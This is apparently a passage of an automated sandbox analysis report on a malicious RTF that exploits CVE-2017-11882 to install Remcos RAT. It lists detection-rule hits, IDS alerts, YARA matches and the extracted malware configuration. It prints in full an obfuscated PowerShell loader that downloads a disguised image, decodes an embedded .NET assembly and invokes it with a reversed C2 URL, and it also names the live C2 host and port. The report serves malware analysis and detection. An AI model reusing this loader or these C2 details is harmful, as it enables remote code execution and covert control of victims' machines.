?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 
[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3616, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" , ProcessId: 3756, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3616, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? 
? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ?
                  Source: File created, Author: Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3568, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3800, TargetFilename: C:\Users\user\AppData\Local\Temp\ctbhyd0y.ips.ps1

                  Data Obfuscation

                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = 
$loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB

                  Stealing of Sensitive Information

                  Source: Registry Key set, Author: Joe Security, Data: Details: 94 80 15 51 D0 65 B6 50 41 75 AB 59 6C D0 B6 DE 5B 82 DC 51 EE D7 CB 4A C6 C2 EC 20 E6 D7 68 F7 DD FB FD 48 BF 92 F0 14 1B 58 2E A1 0B D2 4F C2 CF A7 15 23 D4 B7 0D 25 B5 C3 3E 79 8A 86 82 DC EF E1 D0 57 EB FE 59 19 27 C2 5E A2 22 17 BB D1 ED 85 E0 15 F9 96 05 41 4A 6A 1B C3 A6 8F 2C 65 0E 4F 9C 6E DF F9 12 17 4C C0 2B 26 30 EC 9D 4B FF 38 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 4008, TargetObject: HKEY_CURRENT_USER\Software\Rmc-OT0ZCG\exepath
                  Timestamp                        SID      Severity  Classtype                                        Source IP        Source Port  Destination IP   Destination Port  Protocol
                  2024-09-06T11:26:05.269595+0200  2020423  1         Exploit Kit Activity Detected                    85.239.241.184   80           192.168.2.22     49163             TCP
                  2024-09-06T11:26:05.269595+0200  2020425  1         Exploit Kit Activity Detected                    85.239.241.184   80           192.168.2.22     49163             TCP
                  2024-09-06T11:26:08.593962+0200  2036594  1         Malware Command and Control Activity Detected    192.168.2.22     49164        45.89.247.65     2201              TCP
                  2024-09-06T11:26:10.069561+0200  2036594  1         Malware Command and Control Activity Detected    192.168.2.22     49165        45.89.247.65     2201              TCP
                  2024-09-06T11:26:04.354590+0200  2049038  1         A Network Trojan was detected                    207.241.224.2    443          192.168.2.22     49162             TCP
                  2024-09-06T11:26:09.960512+0200  2803304  3         Unknown Traffic                                  192.168.2.22     49166        178.237.33.50    80                TCP

                  AV Detection

                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf, Avira: detected
                  Source: dremom2.duckdns.org, Avira URL Cloud: Label: malware
                  Source: 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "dremom2.duckdns.org:2201:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OT0ZCG", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: http://geoplugin.net/json.gp, Virustotal: Detection: 8%
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf, Virustotal: Detection: 53%
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf, ReversingLabs: Detection: 47%
                  Source: Yara match, File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000008.00000002.875009514.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 8_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 8_2_004338C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 11_2_00404423 FreeLibrary,CryptUnprotectData, 11_2_00404423
                  Source: powershell.exe, 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_c3ee1250-a

                  Exploits

                  Source: Yara match, File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 85.239.241.184 Port: 80
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Windows\SysWOW64\wscript.exe
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                  Privilege Escalation

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 8_2_00407538 _wcslen,CoGetObject, 8_2_00407538
                  Source: unknown, HTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
